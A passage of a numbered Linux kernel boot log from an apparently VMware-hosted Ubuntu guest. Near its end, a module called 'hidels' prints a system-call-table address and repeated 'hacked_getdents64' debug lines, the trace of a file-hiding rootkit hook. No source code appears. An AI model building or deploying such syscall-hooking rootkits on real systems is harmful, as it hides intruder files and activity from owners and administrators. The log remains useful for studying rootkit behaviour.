0000:02:03.0: irq 17, io mem 0xc9000000 771 | [ 5.786948] ehci-pci 0000:02:03.0: USB 2.0 started, EHCI 1.00 772 | [ 5.838131] usb usb1: New USB device found, idVendor=1d6b, idProduct=0002 773 | [ 5.838178] usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1 774 | [ 5.838214] usb usb1: Product: EHCI Host Controller 775 | [ 5.838249] usb usb1: Manufacturer: Linux 3.8.0-29-generic ehci_hcd 776 | [ 5.838282] usb usb1: SerialNumber: 0000:02:03.0 777 | [ 5.838660] hub 1-0:1.0: USB hub found 778 | [ 5.838745] hub 1-0:1.0: 6 ports detected 779 | [ 5.838914] ehci-platform: EHCI generic platform driver 780 | [ 5.838998] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver 781 | [ 5.839083] uhci_hcd: USB Universal Host Controller Interface driver 782 | [ 5.839168] uhci_hcd 0000:02:00.0: UHCI Host Controller 783 | [ 5.839185] uhci_hcd 0000:02:00.0: new USB bus registered, assigned bus number 2 784 | [ 5.839359] uhci_hcd 0000:02:00.0: irq 18, io base 0x000020c0 785 | [ 5.842172] usb usb2: New USB device found, idVendor=1d6b, idProduct=0001 786 | [ 5.842224] usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1 787 | [ 5.842234] usb usb2: Product: UHCI Host Controller 788 | [ 5.842241] usb usb2: Manufacturer: Linux 3.8.0-29-generic uhci_hcd 789 | [ 5.842249] usb usb2: SerialNumber: 0000:02:00.0 790 | [ 5.842463] hub 2-0:1.0: USB hub found 791 | [ 5.842548] hub 2-0:1.0: 2 ports detected 792 | [ 5.842717] i8042: PNP: PS/2 Controller [PNP0303:KBC,PNP0f13:MOUS] at 0x60,0x64 irq 1,12 793 | [ 5.843480] serio: i8042 KBD port at 0x60,0x64 irq 1 794 | [ 5.843617] serio: i8042 AUX port at 0x60,0x64 irq 12 795 | [ 5.844050] mousedev: PS/2 mouse device common for all mice 796 | [ 5.845606] rtc_cmos 00:03: rtc core: registered rtc_cmos as rtc0 797 | [ 5.846360] rtc0: alarms up to one month, y3k, 114 bytes nvram, hpet irqs 798 | [ 5.846445] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1 799 | [ 5.847034] device-mapper: uevent: version 1.0.3 800 | [ 5.847210] device-mapper: ioctl: 4.23.1-ioctl (2012-12-18) initialised: dm-devel@redhat.com 801 | [ 5.847294] EISA: Probing bus 0 at eisa.0 802 | [ 5.847379] EISA: Cannot allocate resource for mainboard 803 | [ 5.847463] Cannot allocate resource for EISA slot 1 804 | [ 5.847494] Cannot allocate resource for EISA slot 2 805 | [ 5.847499] Cannot allocate resource for EISA slot 3 806 | [ 5.847504] Cannot allocate resource for EISA slot 4 807 | [ 5.847508] Cannot allocate resource for EISA slot 5 808 | [ 5.847513] Cannot allocate resource for EISA slot 6 809 | [ 5.847518] Cannot allocate resource for EISA slot 7 810 | [ 5.847522] Cannot allocate resource for EISA slot 8 811 | [ 5.847548] EISA: Detected 0 cards. 812 | [ 5.847717] cpufreq-nforce2: No nForce2 chipset. 813 | [ 5.847802] cpuidle: using governor ladder 814 | [ 5.847886] cpuidle: using governor menu 815 | [ 5.847971] ledtrig-cpu: registered to indicate activity on CPUs 816 | [ 5.848008] EFI Variables Facility v0.08 2004-May-17 817 | [ 5.848421] ashmem: initialized 818 | [ 5.848688] TCP: cubic registered 819 | [ 5.848772] NET: Registered protocol family 10 820 | [ 5.930007] NET: Registered protocol family 17 821 | [ 5.930091] Key type dns_resolver registered 822 | [ 5.930285] Using IPI No-Shortcut mode 823 | [ 5.930621] Loading module verification certificates 824 | [ 5.962058] MODSIGN: Loaded cert 'Magrathea: Glacier signing key: 760b08a5a1de9684ced1bfd52640b05fe41b6ca5' 825 | [ 5.962143] registered taskstats version 1 826 | [ 5.970057] ata2.00: ATAPI: VMware Virtual IDE CDROM Drive, 00000001, max UDMA/33 827 | [ 5.970636] ata2.00: configured for UDMA/33 828 | [ 6.046471] Key type trusted registered 829 | [ 6.051177] Key type encrypted registered 830 | [ 6.147712] isapnp: No Plug & Play device found 831 | [ 6.161727] scsi 1:0:0:0: CD-ROM NECVMWar VMware IDE CDR10 1.00 PQ: 0 ANSI: 5 832 | [ 6.163462] sr0: scsi3-mmc drive: 306x/306x cd/rw xa/form2 cdda tray 833 | [ 6.163547] cdrom: Uniform CD-ROM driver Revision: 3.20 834 | [ 6.163794] sr 1:0:0:0: Attached scsi CD-ROM sr0 835 | [ 6.164397] sr 1:0:0:0: Attached scsi generic sg0 type 5 836 | [ 6.174339] rtc_cmos 00:03: setting system clock to 2014-05-14 12:53:42 UTC (1400072022) 837 | [ 6.174576] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found 838 | [ 6.174616] EDD information not available. 839 | [ 6.181779] Freeing unused kernel memory: 796k freed 840 | [ 6.185774] Write protecting the kernel text: 6360k 841 | [ 6.185859] Write protecting the kernel read-only data: 2496k 842 | [ 6.185892] NX-protecting the kernel data: 3880k 843 | [ 6.201680] usb 2-1: new full-speed USB device number 2 using uhci_hcd 844 | [ 6.269658] udevd[93]: starting version 175 845 | [ 6.285596] Disabling lock debugging due to kernel taint 846 | [ 6.301744] VMware vmxnet3 virtual NIC driver - version 1.1.29.0-k-NAPI 847 | [ 6.321682] VMware PVSCSI driver - version 1.0.2.0-k 848 | [ 6.333650] usb 2-1: New USB device found, idVendor=0e0f, idProduct=0003 849 | [ 6.333663] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 850 | [ 6.333671] usb 2-1: Product: VMware Virtual USB Mouse 851 | [ 6.333678] usb 2-1: Manufacturer: VMware 852 | [ 6.334037] VMware vmxnet virtual NIC driver 853 | [ 6.337566] Found vmxnet/PCI at 0x2024, irq 19. 854 | [ 6.349561] features: 855 | [ 6.349636] numRxBuffers = 100, numRxBuffers2 = 1 856 | [ 6.349712] vmxnet 0000:02:01.0 eth0: set_features() failed (-1); wanted 0x0000000000004000, left 0x0000000000004800 857 | [ 6.453350] usb 2-2: new full-speed USB device number 3 using uhci_hcd 858 | [ 6.583235] usb 2-2: New USB device found, idVendor=0e0f, idProduct=0002 859 | [ 6.583273] usb 2-2: New USB device strings: Mfr=0, Product=1, SerialNumber=0 860 | [ 6.583306] usb 2-2: Product: VMware Virtual USB Hub 861 | [ 6.586515] hub 2-2:1.0: USB hub found 862 | [ 6.587168] hub 2-2:1.0: 7 ports detected 863 | [ 6.682023] usbcore: registered new interface driver usbhid 864 | [ 6.682066] usbhid: USB HID core driver 865 | [ 6.822102] Floppy drive(s): fd0 is 1.44M 866 | [ 6.830450] Fusion MPT base driver 3.04.20 867 | [ 6.830510] Copyright (c) 1999-2008 LSI Corporation 868 | [ 6.830850] Fusion MPT SPI Host driver 3.04.20 869 | [ 6.857045] FDC 0 is a post-1991 82077 870 | [ 6.864905] mptbase: ioc0: Initiating bringup 871 | [ 6.936787] ioc0: LSI53C1030 B0: Capabilities={Initiator} 872 | [ 7.035005] input: VMware VMware Virtual USB Mouse as /devices/pci0000:00/0000:00:11.0/0000:02:00.0/usb2/2-1/2-1:1.0/input/input2 873 | [ 7.036177] hid-generic 0003:0E0F:0003.0001: input,hidraw0: USB HID v1.10 Mouse [VMware VMware Virtual USB Mouse] on usb-0000:02:00.0-1/input0 874 | [ 7.039737] input: VMware VMware Virtual USB Mouse as /devices/pci0000:00/0000:00:11.0/0000:02:00.0/usb2/2-1/2-1:1.1/input/input3 875 | [ 7.040305] hid-generic 0003:0E0F:0003.0002: input,hidraw1: USB HID v1.10 Mouse [VMware VMware Virtual USB Mouse] on usb-0000:02:00.0-1/input1 876 | [ 7.098110] scsi2 : ioc0: LSI53C1030 B0, FwRev=01032920h, Ports=1, MaxQ=128, IRQ=17 877 | [ 7.208891] scsi 2:0:0:0: Direct-Access VMware, VMware Virtual S 1.0 PQ: 0 ANSI: 2 878 | [ 7.208983] scsi target2:0:0: Beginning Domain Validation 879 | [ 7.210991] scsi target2:0:0: Domain Validation skipping write tests 880 | [ 7.211030] scsi target2:0:0: Ending Domain Validation 881 | [ 7.211214] scsi target2:0:0: FAST-40 WIDE SCSI 80.0 MB/s ST (25 ns, offset 127) 882 | [ 7.217221] sd 2:0:0:0: [sda] 41943040 512-byte logical blocks: (21.4 GB/20.0 GiB) 883 | [ 7.217455] sd 2:0:0:0: [sda] Write Protect is off 884 | [ 7.217502] sd 2:0:0:0: [sda] Mode Sense: 61 00 00 00 885 | [ 7.217778] sd 2:0:0:0: [sda] Cache data unavailable 886 | [ 7.217821] sd 2:0:0:0: [sda] Assuming drive cache: write through 887 | [ 7.219152] sd 2:0:0:0: [sda] Cache data unavailable 888 | [ 7.219162] sd 2:0:0:0: [sda] Assuming drive cache: write through 889 | [ 7.220534] sd 2:0:0:0: Attached scsi generic sg1 type 0 890 | [ 7.225458] sda: sda1 sda2 < sda5 > 891 | [ 7.226828] sd 2:0:0:0: [sda] Cache data unavailable 892 | [ 7.226838] sd 2:0:0:0: [sda] Assuming drive cache: write through 893 | [ 7.226971] sd 2:0:0:0: [sda] Attached SCSI disk 894 | [ 7.345051] EXT4-fs (sda1): INFO: recovery required on readonly filesystem 895 | [ 7.345098] EXT4-fs (sda1): write access will be enabled during recovery 896 | [ 7.620440] EXT4-fs (sda1): orphan cleanup on readonly fs 897 | [ 7.620595] EXT4-fs (sda1): ext4_orphan_cleanup: deleting unreferenced inode 1055850 898 | [ 7.624413] EXT4-fs (sda1): ext4_orphan_cleanup: deleting unreferenced inode 1054407 899 | [ 7.624513] EXT4-fs (sda1): ext4_orphan_cleanup: deleting unreferenced inode 923874 900 | [ 7.624552] EXT4-fs (sda1): ext4_orphan_cleanup: deleting unreferenced inode 1054397 901 | [ 7.624612] EXT4-fs (sda1): ext4_orphan_cleanup: deleting unreferenced inode 923896 902 | [ 7.624727] EXT4-fs (sda1): 5 orphan inodes deleted 903 | [ 7.624780] EXT4-fs (sda1): recovery complete 904 | [ 7.631860] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) 905 | [ 8.077355] init: ureadahead main process (260) terminated with status 5 906 | [ 8.541236] Adding 1046524k swap on /dev/sda5. Priority:-1 extents:1 across:1046524k 907 | [ 8.736105] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready 908 | [ 8.815865] udevd[335]: starting version 175 909 | [ 9.199774] lp: driver loaded but no devices found 910 | [ 9.250230] EXT4-fs (sda1): re-mounted. Opts: errors=remount-ro 911 | [ 9.521895] shpchp: Standard Hot Plug PCI Controller Driver version: 0.4 912 | [ 9.629743] [413]: VMCI: shared components initialized. 913 | [ 9.629839] Probing for vmci/PCI. 914 | [ 9.629935] Found vmci/PCI at 0x1080, irq 16. 915 | [ 9.630032] VMCI: using capabilities 0xc. 916 | [ 9.630128] [413]: VMCI: Host capability check passed. 917 | [ 9.635918] vmci 0000:00:07.7: irq 72 for MSI/MSI-X 918 | [ 9.645296] vmci 0000:00:07.7: irq 73 for MSI/MSI-X 919 | [ 9.645392] Registered vmci device. 920 | [ 9.654461] [413]: VMCI: Using guest personality 921 | [ 9.654557] [413]: VMCI: host components initialized. 922 | [ 9.666169] piix4_smbus 0000:00:07.3: Host SMBus controller not enabled! 923 | [ 9.677804] [413]: VMCI: Module registered (name=vmci,major=10,minor=54). 924 | [ 9.677849] [413]: VMCI: Using host personality 925 | [ 9.677875] [413]: VMCI: Module (name=vmci) is initialized 926 | [ 9.769589] [drm] Initialized drm 1.1.0 20060810 927 | [ 9.910526] [drm] Capabilities: 928 | [ 9.910556] [drm] Rect copy. 929 | [ 9.910577] [drm] Cursor. 930 | [ 9.910598] [drm] Cursor bypass. 931 | [ 9.910622] [drm] Cursor bypass 2. 932 | [ 9.910641] [drm] 8bit emulation. 933 | [ 9.910662] [drm] Alpha cursor. 934 | [ 9.910682] [drm] 3D. 935 | [ 9.910703] [drm] Extended Fifo. 936 | [ 9.910801] [drm] Multimon. 937 | [ 9.910823] [drm] Pitchlock. 938 | [ 9.910843] [drm] Irq mask. 939 | [ 9.910863] [drm] Display Topology. 940 | [ 9.910883] [drm] GMR. 941 | [ 9.910902] [drm] Traces. 942 | [ 9.910922] [drm] GMR2. 943 | [ 9.910942] [drm] Screen Object 2. 944 | [ 9.910976] [drm] Max GMR ids is 64 945 | [ 9.910995] [drm] Max GMR descriptors is 4096 946 | [ 9.911021] [drm] Max number of GMR pages is 196608 947 | [ 9.911041] [drm] Max dedicated hypervisor surface memory is 786432 kiB 948 | [ 9.911065] [drm] VRAM at 0xd0000000 size is 131072 kiB 949 | [ 9.911087] [drm] MMIO at 0xc8800000 size is 2048 kiB 950 | [ 9.911185] [drm] global init. 951 | [ 9.921228] [TTM] Zone kernel: Available graphics memory: 445530 kiB 952 | [ 9.921254] [TTM] Zone highmem: Available graphics memory: 513054 kiB 953 | [ 9.921303] [TTM] Initializing pool allocator 954 | [ 9.921401] [TTM] Initializing DMA pool allocator 955 | [ 9.967512] [drm] Supports vblank timestamp caching Rev 1 (10.10.2010). 956 | [ 9.967543] [drm] No driver support for vblank timestamp query. 957 | [ 9.967641] [drm] Screen objects system initialized 958 | [ 9.975137] [drm] width 640 959 | [ 9.975177] [drm] height 480 960 | [ 9.975276] [drm] bpp 32 961 | [ 9.977058] [drm] Fifo max 0x00200000 min 0x00001000 cap 0x0000077f 962 | [ 10.666789] fbcon: svgadrmfb (fb0) is primary device 963 | [ 12.415573] Console: switching to colour frame buffer device 100x37 964 | [ 12.961685] [drm] Initialized vmwgfx 2.4.0 20120209 for 0000:00:0f.0 on minor 0 965 | [ 13.321700] ppdev: user-space parallel port driver 966 | [ 13.660444] parport_pc 00:08: reported by Plug and Play ACPI 967 | [ 13.661363] parport0: PC-style at 0x378, irq 7 [PCSPP,TRISTATE] 968 | [ 13.914356] lp0: using parport0 (interrupt-driven). 969 | [ 16.767775] input: ImPS/2 Generic Wheel Mouse as /devices/platform/i8042/serio1/input/input4 970 | [ 17.064623] Bluetooth: Core ver 2.16 971 | [ 17.065062] NET: Registered protocol family 31 972 | [ 17.065099] Bluetooth: HCI device and connection manager initialized 973 | [ 17.066795] microcode: CPU0 sig=0x1067a, pf=0x1, revision=0xa07 974 | [ 17.068202] Bluetooth: HCI socket layer initialized 975 | [ 17.068323] Bluetooth: L2CAP socket layer initialized 976 | [ 17.068504] Bluetooth: SCO socket layer initialized 977 | [ 17.508971] Bluetooth: RFCOMM TTY layer initialized 978 | [ 17.509118] Bluetooth: RFCOMM socket layer initialized 979 | [ 17.509154] Bluetooth: RFCOMM ver 1.11 980 | [ 18.266077] type=1400 audit(1400072034.600:2): apparmor="STATUS" operation="profile_load" name="/sbin/dhclient" pid=606 comm="apparmor_parser" 981 | [ 18.304584] type=1400 audit(1400072034.608:3): apparmor="STATUS" operation="profile_load" name="/usr/lib/NetworkManager/nm-dhcp-client.action" pid=606 comm="apparmor_parser" 982 | [ 18.305268] type=1400 audit(1400072034.608:4): apparmor="STATUS" operation="profile_load" name="/usr/lib/connman/scripts/dhclient-script" pid=606 comm="apparmor_parser" 983 | [ 18.355210] type=1400 audit(1400072034.656:5): apparmor="STATUS" operation="profile_replace" name="/sbin/dhclient" pid=669 comm="apparmor_parser" 984 | [ 18.506423] type=1400 audit(1400072034.808:6): apparmor="STATUS" operation="profile_replace" name="/usr/lib/NetworkManager/nm-dhcp-client.action" pid=669 comm="apparmor_parser" 985 | [ 18.506801] type=1400 audit(1400072034.808:7): apparmor="STATUS" operation="profile_replace" name="/usr/lib/connman/scripts/dhclient-script" pid=669 comm="apparmor_parser" 986 | [ 18.557824] Bluetooth: BNEP (Ethernet Emulation) ver 1.3 987 | [ 18.557855] Bluetooth: BNEP filters: protocol multicast 988 | [ 18.558313] Bluetooth: BNEP socket layer initialized 989 | [ 18.569651] type=1400 audit(1400072034.904:8): apparmor="STATUS" operation="profile_load" name="/usr/lib/cups/backend/cups-pdf" pid=605 comm="apparmor_parser" 990 | [ 18.607644] type=1400 audit(1400072034.944:9): apparmor="STATUS" operation="profile_load" name="/usr/sbin/cupsd" pid=605 comm="apparmor_parser" 991 | [ 22.706982] init: failsafe main process (682) killed by TERM signal 992 | [ 25.654447] microcode: Microcode Update Driver: v2.00 , Peter Oruba 993 | [ 38.863719] type=1400 audit(1400072055.224:10): apparmor="STATUS" operation="profile_load" name="/usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper" pid=874 comm="apparmor_parser" 994 | [ 38.865156] type=1400 audit(1400072055.228:11): apparmor="STATUS" operation="profile_load" name="/usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper//chromium_browser" pid=874 comm="apparmor_parser" 995 | [ 38.882383] type=1400 audit(1400072055.244:12): apparmor="STATUS" operation="profile_replace" name="/sbin/dhclient" pid=877 comm="apparmor_parser" 996 | [ 38.889670] type=1400 audit(1400072055.252:13): apparmor="STATUS" operation="profile_replace" name="/usr/lib/NetworkManager/nm-dhcp-client.action" pid=877 comm="apparmor_parser" 997 | [ 38.889958] type=1400 audit(1400072055.252:14): apparmor="STATUS" operation="profile_replace" name="/usr/lib/connman/scripts/dhclient-script" pid=877 comm="apparmor_parser" 998 | [ 39.103612] type=1400 audit(1400072055.464:15): apparmor="STATUS" operation="profile_load" name="/usr/bin/evince" pid=882 comm="apparmor_parser" 999 | [ 39.142075] type=1400 audit(1400072055.504:16): apparmor="STATUS" operation="profile_load" name="/usr/bin/evince//launchpad_integration" pid=882 comm="apparmor_parser" 1000 | [ 39.149436] type=1400 audit(1400072055.512:17): apparmor="STATUS" operation="profile_load" name="/usr/bin/evince//sanitized_helper" pid=882 comm="apparmor_parser" 1001 | [ 39.153811] type=1400 audit(1400072055.516:18): apparmor="STATUS" operation="profile_load" name="/usr/bin/evince-previewer" pid=882 comm="apparmor_parser" 1002 | [ 39.172886] type=1400 audit(1400072055.536:19): apparmor="STATUS" operation="profile_load" name="/usr/bin/evince-previewer//launchpad_integration" pid=882 comm="apparmor_parser" 1003 | [ 44.492315] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 1004 | [ 44.508117] acpiphp: Slot [32] registered 1005 | [ 44.510328] acpiphp: Slot [33] registered 1006 | [ 44.511394] acpiphp: Slot [34] registered 1007 | [ 44.512452] acpiphp: Slot [35] registered 1008 | [ 44.523457] acpiphp: Slot [36] registered 1009 | [ 44.530900] acpiphp: Slot [37] registered 1010 | [ 44.530938] acpiphp: Slot [38] registered 1011 | [ 44.530973] acpiphp: Slot [39] registered 1012 | [ 44.531005] acpiphp: Slot [40] registered 1013 | [ 44.531035] acpiphp: Slot [41] registered 1014 | [ 44.531065] acpiphp: Slot [42] registered 1015 | [ 44.531097] acpiphp: Slot [43] registered 1016 | [ 44.531132] acpiphp: Slot [44] registered 1017 | [ 44.531167] acpiphp: Slot [45] registered 1018 | [ 44.531198] acpiphp: Slot [46] registered 1019 | [ 44.531229] acpiphp: Slot [47] registered 1020 | [ 44.531259] acpiphp: Slot [48] registered 1021 | [ 44.531291] acpiphp: Slot [49] registered 1022 | [ 44.531328] acpiphp: Slot [50] registered 1023 | [ 44.531364] acpiphp: Slot [51] registered 1024 | [ 44.531398] acpiphp: Slot [52] registered 1025 | [ 44.531432] acpiphp: Slot [53] registered 1026 | [ 44.531464] acpiphp: Slot [54] registered 1027 | [ 44.531497] acpiphp: Slot [55] registered 1028 | [ 44.531528] acpiphp: Slot [56] registered 1029 | [ 44.531560] acpiphp: Slot [57] registered 1030 | [ 44.531592] acpiphp: Slot [58] registered 1031 | [ 44.531622] acpiphp: Slot [59] registered 1032 | [ 44.531653] acpiphp: Slot [60] registered 1033 | [ 44.531687] acpiphp: Slot [61] registered 1034 | [ 44.531718] acpiphp: Slot [62] registered 1035 | [ 44.531818] acpiphp: Slot [63] registered 1036 | [ 94.909754] audit_printk_skb: 24 callbacks suppressed 1037 | [ 94.910816] type=1400 audit(1400072105.721:28): apparmor="DENIED" operation="open" parent=1 profile="/usr/lib/telepathy/mission-control-5" name="/usr/share/gvfs/remote-volume-monitors/" pid=2183 comm="mission-control" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 1038 | [ 220.533356] sct: 0xc16380a0 1039 | [ 220.533356] 1040 | [ 220.533356] 1041 | [ 220.533356] 1042 | [ 220.533356] 1043 | [ 220.533356] 1044 | [ 220.533419] offset: 0xc11748d0 1045 | [ 220.533419] 1046 | [ 220.533419] 1047 | [ 220.533419] 1048 | [ 220.533714] hidels: module loaded. 1049 | [ 226.143324] hidels_huabei.c 1050 | [ 226.143464] .hidels.o.cmd 1051 | [ 226.143470] hidels.c 1052 | [ 226.143474] .tmp_versions 1053 | [ 226.143478] hidels.mod.o 1054 | [ 226.143481] Makefile 1055 | [ 226.143485] .. 1056 | [ 226.143488] modules.order 1057 | [ 226.143492] . 1058 | [ 226.143495] hidels.o 1059 | [ 226.143498] hidels.ko 1060 | [ 226.143502] Module.symvers 1061 | [ 226.143505] .hidels.ko.cmd 1062 | [ 226.143509] mesg.txt 1063 | [ 226.143512] hidels.mod.c 1064 | [ 226.143516] .hidels.mod.o.cmd 1065 | [ 226.143544] finished hacked_getdents64. 1066 | [ 226.143632] finished hacked_getdents64. 1067 | [ 252.124660] .. 1068 | [ 252.124667] giomodule.cache 1069 | [ 252.124669] libgioremote-volume-monitor.so 1070 | [ 252.124672] . 1071 | [ 252.124674] libdconfsettings.so 1072 | [ 252.124676] libgiolibproxy.so 1073 | [ 252.124678] libgvfsdbus.so 1074 | [ 252.124680] libgiognomeproxy.so 1075 | [ 252.124683] libgiognutls.so 1076 | [ 252.124685] finished hacked_getdents64. 1077 | [ 252.129999] .. 1078 | [ 252.130004] . 1079 | [ 252.130006] gphoto2.monitor 1080 | [ 252.130008] afc.monitor 1081 | [ 252.130010] gdu.monitor 1082 | [ 252.130012] finished hacked_getdents64. 1083 | [ 252.130597] finished hacked_getdents64. 1084 | [ 252.136889] finished hacked_getdents64. 1085 | [ 253.420733] .. 1086 | [ 253.420739] . 1087 | [ 253.420741] finished hacked_getdents64. 1088 | [ 253.420745] finished hacked_getdents64. 1089 | [ 253.421015] . 1090 | [ 253.421019] .. 1091 | [ 253.421021] configglue-1.0.egg-info 1092 | [ 253.421024] pygtk.pth 1093 | [ 253.421026] debtagshw-0.1.egg-info 1094 | [ 253.421028] piston_mini_client 1095 | [ 253.421030] _dbus_glib_bindings.so 1096 | [ 253.421033] UbuntuSystemService 1097 | [ 253.421035] ibus 1098 | [ 253.421037] unity_lens_video-0.3.5.egg-info 1099 | [ 253.421040] dirspec-3.0.0.egg-info 1100 | [ 253.421042] AptUrl 1101 | [ 253.421044] software_center_aptd_plugins-0.0.0.egg-info 1102 | [ 253.421047] ubuntu-sso-client.pth 1103 | [ 253.421049] glib 1104 | [ 253.421051] wadllib 1105 | [ 253.421053] ubuntuone-couch 1106 | [ 253.421055] zope.interface-3.6.1-nspkg.pth 1107 | [ 253.421058] ubuntuone-storage-protocol 1108 | [ 253.421060] Twisted_Names-11.1.0.egg-info 1109 | [ 253.421063] pyOpenSSL-0.12.egg-info 1110 | [ 253.421065] pycurl.so 1111 | [ 253.421067] language_support_pkgs.pyc 1112 | [ 253.421070] xdg 1113 | [ 253.421072] PAM-0.4.2.egg-info 1114 | [ 253.421074] speechd 1115 | [ 253.421076] piston_mini_client-0.7.2.egg-info 1116 | [ 253.421079] apport 1117 | [ 253.421080] apturl-0.5.1ubuntu3.egg-info 1118 | [ 253.421152] PAMmodule.so 1119 | [ 253.421177] deb822.py 1120 | [ 253.421180] screen.py 1121 | [ 253.421182] keyring-0.9.2.egg-info 1122 | [ 253.421185] sgmlop.so 1123 | [ 253.421187] README 1124 | [ 253.421189] Mako-0.5.0.egg-info 1125 | [ 253.421191] twisted 1126 | [ 253.421193] debconf.pyc 1127 | [ 253.421195] lsb_release.py 1128 | [ 253.421197] _dbus_bindings.so 1129 | [ 253.421199] aptdaemon 1130 | [ 253.421201] dateutil 1131 | [ 253.421203] simplejson-2.3.2.egg-info 1132 | [ 253.421206] gi 1133 | [ 253.421207] mx 1134 | [ 253.421209] louis-2.3.0.egg-info 1135 | [ 253.421212] drv_libxml2.pyc 1136 | [ 253.421214] CommandNotFound 1137 | [ 253.421216] pycups-1.9.61.egg-info 1138 | [ 253.421218] ubuntuone-installer.pth 1139 | [ 253.421221] lsb_release.pyc 1140 | [ 253.421223] dirspec 1141 | [ 253.421225] ubuntu-sso-client 1142 | [ 253.421227] NvidiaDetector 1143 | [ 253.421229] problem_report.pyc 1144 | [ 253.421231] defer-1.0.2.egg-info 1145 | [ 253.421234] pygtk.pyc 1146 | [ 253.421236] python_apt-0.8.3ubuntu7.1.egg-info 1147 | [ 253.421239] oneconf 1148 | [ 253.421240] onboard-0.97.1.egg-info 1149 | [ 253.421243] protobuf-2.4.1.egg-info 1150 | [ 253.421245] screen.pyc 1151 | [ 253.421247] libxml2.py 1152 | [ 253.421249] virtkey.so 1153 | [ 253.421251] usb_creator-0.2.23.egg-info 1154 | [ 253.421254] unohelper.py 1155 | [ 253.421256] pexpect-2.3.egg-info 1156 | [ 253.421258] python_debian-0.1.21ubuntu1.egg-info 1157 | [ 253.421261] pycurl-7.19.0.egg-info 1158 | [ 253.421264] apt_pkg.so 1159 | [ 253.421266] GnuPGInterface.py 1160 | [ 253.421268] jockey-0.9.7.egg-info 1161 | [ 253.421270] lazr.restfulclient-0.12.0.egg-info 1162 | [ 253.421273] pkg_resources.pyc 1163 | [ 253.421275] FSM.py 1164 | [ 253.421277] drv_libxml2.py 1165 | [ 253.421279] PIL 1166 | [ 253.421281] unity_scope_video_remote-0.3.5.egg-info 1167 | [ 253.421284] ubuntuone-client 1168 | [ 253.421286] command_not_found-0.2.44.egg-info 1169 | [ 253.421289] python_dateutil-1.5.egg-info 1170 | [ 253.421291] ufw-0.31.1_1.egg-info 1171 | [ 253.421294] debian_bundle 1172 | [ 253.421296] softwareproperties 1173 | [ 253.421298] appindicator 1174 | [ 253.421300] Crypto 1175 | [ 253.421302] pyxdg-0.19.egg-info 1176 | [ 253.421304] xdiagnose 1177 | [ 253.421306] gwibber 1178 | [ 253.421308] cups.so 1179 | [ 253.421310] google 1180 | [ 253.421312] pyinotify.py 1181 | [ 253.421314] jockey 1182 | [ 253.421316] checkbox 1183 | [ 253.421318] softwarecenter_aptd_plugins 1184 | [ 253.421321] FSM.pyc 1185 | [ 253.421322] keyring 1186 | [ 253.421324] apt 1187 | [ 253.421326] computerjanitor 1188 | [ 253.421328] debian 1189 | [ 253.421330] system_service-0.1.6.egg-info 1190 | [ 253.421333] debconf.py 1191 | [ 253.421335] unattended_upgrades-0.1.egg-info 1192 | [ 253.421338] pyinotify.pyc 1193 | [ 253.421340] adium_theme_ubuntu-0.3.2.egg-info 1194 | [ 253.421342] ufw 1195 | [ 253.421344] xdiagnose-2.5.3.egg-info 1196 | [ 253.421347] lazr.uri-1.0.3-nspkg.pth 1197 | [ 253.421349] pygst.py 1198 | [ 253.421351] defer 1199 | [ 253.421353] scanext.so 1200 | [ 253.421355] language_selector-0.1.egg-info 1201 | [ 253.421358] simplejson 1202 | [ 253.421360] problem_report.py 1203 | [ 253.421362] Onboard 1204 | [ 253.421364] gnome_sudoku 1205 | [ 253.421366] sessioninstaller-0.0.0.egg-info 1206 | [ 253.421369] UpdateManager 1207 | [ 253.421371] launchpadlib 1208 | [ 253.421373] xapian 1209 | [ 253.421375] DistUpgrade 1210 | [ 253.421377] pygst.pyc 1211 | [ 253.421379] httplib2 1212 | [ 253.421381] reportlab-2.5.egg-info 1213 | [ 253.421383] python_virtkey-0.60.0.egg-info 1214 | [ 253.421386] apt_inst.so 1215 | [ 253.421388] XKit 1216 | [ 253.421390] _rl_accel.so 1217 | [ 253.421392] Brlapi-0.5.6.egg-info 1218 | [ 253.421394] httplib2-0.7.2.egg-info 1219 | [ 253.421396] axi 1220 | [ 253.421398] unohelper.pyc 1221 | [ 253.421400] pxssh.py 1222 | [ 253.421402] ubuntuone-client.pth 1223 | [ 253.421405] pysmbc-1.0.13.egg-info 1224 | [ 253.421407] pexpect.pyc 1225 | [ 253.421409] rhythmbox_ubuntuone-3.0.0.egg-info 1226 | [ 253.421412] pxssh.pyc 1227 | [ 253.421414] language_support_pkgs.py 1228 | [ 253.421416] launchpadlib-1.9.12.egg-info 1229 | [ 253.421419] apport_python_hook.py 1230 | [ 253.421421] scanext.la 1231 | [ 253.421423] usbcreator 1232 | [ 253.421425] GnuPGInterface-0.3.2.egg-info 1233 | [ 253.421428] ubuntuone-control-panel.pth 1234 | [ 253.421431] cupsext.la 1235 | [ 253.421433] checkbox_qt 1236 | [ 253.421435] MarkupSafe-0.15.egg-info 1237 | [ 253.421437] fdpexpect.pyc 1238 | [ 253.421444] hpmudext.so 1239 | [ 253.421446] oauth 1240 | [ 253.421448] xkit-0.0.0.egg-info 1241 | [ 253.421451] chardet-2.0.1.egg-info 1242 | [ 253.421453] pygst.pth 1243 | [ 253.421455] oauth-1.0.1.egg-info 1244 | [ 253.421457] pycrypto-2.4.1.egg-info 1245 | [ 253.421460] curl 1246 | [ 253.421462] PIL.pth 1247 | [ 253.421464] libproxy.py 1248 | [ 253.421466] cairo 1249 | [ 253.421467] gst-0.10 1250 | [ 253.421469] cupsext.so 1251 | [ 253.421471] pyHnj.so 1252 | [ 253.421473] speechd_config 1253 | [ 253.421475] libxml2mod.so 1254 | [ 253.421478] dbus 1255 | [ 253.421479] louis 1256 | [ 253.421481] ubuntuone-couch.pth 1257 | [ 253.421483] ANSI.pyc 1258 | [ 253.421485] pyserial-2.5.egg-info 1259 | [ 253.421488] zope.interface-3.6.1.egg-info 1260 | [ 253.421490] mako 1261 | [ 253.421492] debtagshw 1262 | [ 253.421494] nvidia_common-0.0.0.egg-info 1263 | [ 253.421497] 